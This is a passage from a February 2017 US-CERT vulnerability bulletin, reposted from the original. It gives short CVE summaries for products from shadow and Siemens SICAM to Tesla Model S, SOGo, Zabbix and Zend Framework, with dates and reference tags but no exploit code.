Integer overflow in shadow 4.2.1 allows local users to gain privileges via crafted input to newuidmap. 2017-02-17 not yet calculated CVE-2016-6252
MLIST
MLIST
MLIST
MLIST
CONFIRM
CONFIRM
sieclo_sistemi — sieclo_sistemi
 
An issue was discovered in Sielco Sistemi Winlog Lite SCADA Software, versions prior to Version 3.02.01, and Winlog Pro SCADA Software, versions prior to Version 3.02.01. An uncontrolled search path element (DLL Hijacking) vulnerability has been identified. Exploitation of this vulnerability could give an attacker access to the system with the same level of privilege as the application that utilizes the malicious DLL. 2017-02-13 not yet calculated CVE-2017-5161
BID
MISC
siemans — eta4
 
An issue was discovered in Siemens ETA4 firmware (all versions prior to Revision 08) of the SM-2558 extension module for: SICAM AK, SICAM TM 1703, SICAM BC 1703, and SICAM AK 3. Specially crafted packets sent to Port 2404/TCP could cause the affected device to go into defect mode. A cold start might be required to recover the system, a Denial-of-Service Vulnerability. 2017-02-13 not yet calculated CVE-2016-7987
BID
MISC
siemens — sicam_pas
 
An issue was discovered in Siemens SICAM PAS before 8.00. A factory account with hard-coded passwords is present in the SICAM PAS installations. Attackers might gain privileged access to the database over Port 2638/TCP. 2017-02-13 not yet calculated CVE-2016-8567
BID
MISC
siemens — sicam_pas
 
An issue was discovered in Siemens SICAM PAS before 8.00. Because of Storing Passwords in a Recoverable Format, an authenticated local attacker with certain privileges could possibly reconstruct the passwords of users for accessing the database. 2017-02-13 not yet calculated CVE-2016-8566
BID
MISC
simplesamlphp — simplesamlphp
 
The validateSignature method in the SAML2\Utils class in SimpleSAMLphp before 1.14.10 and simplesamlphp/saml2 library before 1.9.1, 1.10.x before 1.10.3, and 2.x before 2.3.3 allows remote attackers to spoof SAML responses or possibly cause a denial of service (memory consumption) by leveraging improper conversion of return values to boolean. 2017-02-16 not yet calculated CVE-2016-9814
BID
CONFIRM
simplesamlphp — simplesamlphp
 
The SimpleSAML_XML_Validator class constructor in SimpleSAMLphp before 1.14.11 might allow remote attackers to spoof signatures on SAML 1 responses or possibly cause a denial of service (memory consumption) by leveraging improper conversion of return values to boolean. 2017-02-16 not yet calculated CVE-2016-9955
BID
CONFIRM
smiths-medical — cadd-solis_medication_safety_software
 
An issue was discovered in Smiths-Medical CADD-Solis Medication Safety Software, Version 1.0; 2.0; 3.0; and 3.1. CADD-Solis Medication Safety Software grants an authenticated user elevated privileges on the SQL database, which would allow an authenticated user to modify drug libraries, add and delete users, and change user permissions. According to Smiths-Medical, physical access to the pump is required to install drug library updates. 2017-02-13 not yet calculated CVE-2016-8355
BID
MISC
smiths-medical — cadd-solis_medication_safety_software
 
An issue was discovered in Smiths-Medical CADD-Solis Medication Safety Software, Version 1.0; 2.0; 3.0; and 3.1. The affected software does not verify the identities at communication endpoints, which may allow a man-in-the-middle attacker to gain access to the communication channel between endpoints. 2017-02-13 not yet calculated CVE-2016-8358
BID
MISC
sogo — sogo
 
Multiple cross-site scripting (XSS) vulnerabilities in the Web Calendar in SOGo before 2.2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) title of an appointment or (2) contact fields. 2017-02-17 not yet calculated CVE-2014-9905
MLIST
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
sogo — sogo
 
Multiple cross-site scripting (XSS) vulnerabilities in the View Raw Source page in the Web Calendar in SOGo before 3.1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) Description, (2) Location, (3) URL, or (4) Title field. 2017-02-17 not yet calculated CVE-2016-6191
MLIST
CONFIRM
CONFIRM
sogo — sogo
 
SOGo before 2.3.12 and 3.x before 3.1.1 does not restrict access to the UID and DTSTAMP attributes, which allows remote authenticated users to obtain sensitive information about appointments with the "View the Date & Time" restriction, as demonstrated by correlating UIDs and DTSTAMPs between all users. 2017-02-17 not yet calculated CVE-2016-6190
MLIST
CONFIRM
CONFIRM
CONFIRM
sogo — sogo
 
Incomplete blacklist in SOGo before 2.3.12 and 3.x before 3.1.1 allows remote authenticated users to obtain sensitive information by reading the fields in the (1) ics or (2) XML calendar feeds. 2017-02-17 not yet calculated CVE-2016-6189
MLIST
CONFIRM
CONFIRM
CONFIRM
st_jude_medical — merlin@home
 
An issue was discovered in St. Jude Medical Merlin@home, versions prior to Version 8.2.2 (RF models: EX1150; Inductive models: EX1100; and Inductive models: EX1100 with MerlinOnDemand capability). The identities of the endpoints for the communication channel between the transmitter and St. Jude Medical’s web site, Merlin.net, are not verified. This may allow a man-in-the-middle attacker to access or influence communications between the identified endpoints. 2017-02-13 not yet calculated CVE-2017-5149
BID
MISC
tesla — model_s
 
An issue was discovered in Tesla Motors Model S automobile, all firmware versions before version 7.1 (2.36.31) with web browser functionality enabled. The vehicle’s Gateway ECU is susceptible to commands that may allow an attacker to install malicious software allowing the attacker to send messages to the vehicle’s CAN bus, a Command Injection. 2017-02-13 not yet calculated CVE-2016-9337
BID
MISC
tre_library_musl_libc — tre_library_musl_libc
 
Multiple integer overflows in the TRE library and musl libc allow attackers to cause memory corruption via a large number of (1) states or (2) tags, which triggers an out-of-bounds write. 2017-02-13 not yet calculated CVE-2016-8859
MLIST
MLIST
BID
unix — intersect_alliance_snare_epilog
 
Cross-site scripting (XSS) vulnerability in InterSect Alliance SNARE Epilog for UNIX version 1.5 allows remote authenticated users to inject arbitrary web script or HTML via the str_log_name parameter in a "Web Admin Portal > Log Configuration > Add" action. 2017-02-17 not yet calculated CVE-2017-5998
MISC
visonic — powerlink2
 
An issue was discovered in Visonic PowerLink2, all versions prior to October 2016 firmware release. When a specific URL to an image is accessed, the downloaded image carries with it source code used in the web server (INFORMATION EXPOSURE). 2017-02-13 not yet calculated CVE-2016-5813
BID
MISC
wago — wago
 
An issue was discovered in WAGO 750-8202/PFC200 prior to FW04 (released August 2015), WAGO 750-881 prior to FW09 (released August 2016), and WAGO 0758-0874-0000-0111. By accessing a specific uniform resource locator (URL) on the web server, a malicious user is able to edit and to view settings without authenticating. 2017-02-13 not yet calculated CVE-2016-9362
BID
MISC
wso2 — wso2_identity_server
 
Cross-site request forgery (CSRF) vulnerability in the XACML flow feature in WSO2 Identity Server 5.1.0 allows remote attackers to hijack the authentication of privileged users for requests that process XACML requests via an entitlement/eval-policy-submit.jsp request. 2017-02-16 not yet calculated CVE-2016-4311
MISC
MISC
BUGTRAQ
BID
EXPLOIT-DB
wso2 — wso2_identity_server
 
XML external entity (XXE) vulnerability in the XACML flow feature in WSO2 Identity Server 5.1.0 before WSO2-CARBON-PATCH-4.4.0-0231 allows remote authenticated users with access to XACML features to read arbitrary files, cause a denial of service, conduct server-side request forgery (SSRF) attacks, or have unspecified other impact via a crafted XACML request to entitlement/eval-policy-submit.jsp. NOTE: this issue can be combined with CVE-2016-4311 to exploit the vulnerability without credentials. 2017-02-16 not yet calculated CVE-2016-4312
MISC
MISC
BUGTRAQ
BID
CONFIRM
EXPLOIT-DB
xen — xen
 
The (1) ioport_read and (2) ioport_write functions in Xen, when qemu is used as a device model within Xen, might allow local x86 HVM guest OS administrators to gain qemu process privileges via vectors involving an out-of-range ioport access. 2017-02-16 not yet calculated CVE-2016-9637
BID
SECTRACK
CONFIRM
CONFIRM
zabbix — zabbix
 
SQL injection vulnerability in Zabbix before 2.2.14 and 3.0 before 3.0.4 allows remote attackers to execute arbitrary SQL commands via the toggle_ids array parameter in latest.php. 2017-02-16 not yet calculated CVE-2016-10134
MLIST
MLIST
BID
CONFIRM
CONFIRM
zend_framework — zend_framework
 
The (1) order and (2) group methods in Zend_Db_Select in the Zend Framework before 1.12.19 might allow remote attackers to conduct SQL injection attacks via vectors related to use of the character pattern [\w]* in a regular expression. 2017-02-16 not yet calculated CVE-2016-6233
BID
CONFIRM
FEDORA
FEDORA
FEDORA
zend_framework — zend_framework
 
The (1) order and (2) group methods in Zend_Db_Select in the Zend Framework before 1.12.20 might allow remote attackers to conduct SQL injection attacks by leveraging failure to remove comments from an SQL statement before validation. 2017-02-16 not yet calculated CVE-2016-4861
JVN
JVNDB
CONFIRM
FEDORA
FEDORA
FEDORA

Back to top


This product is provided subject to this Notification and this Privacy & Use policy.

Source: US-CERT Bulletins @ February 20, 2017 at 09:16AM

0
Share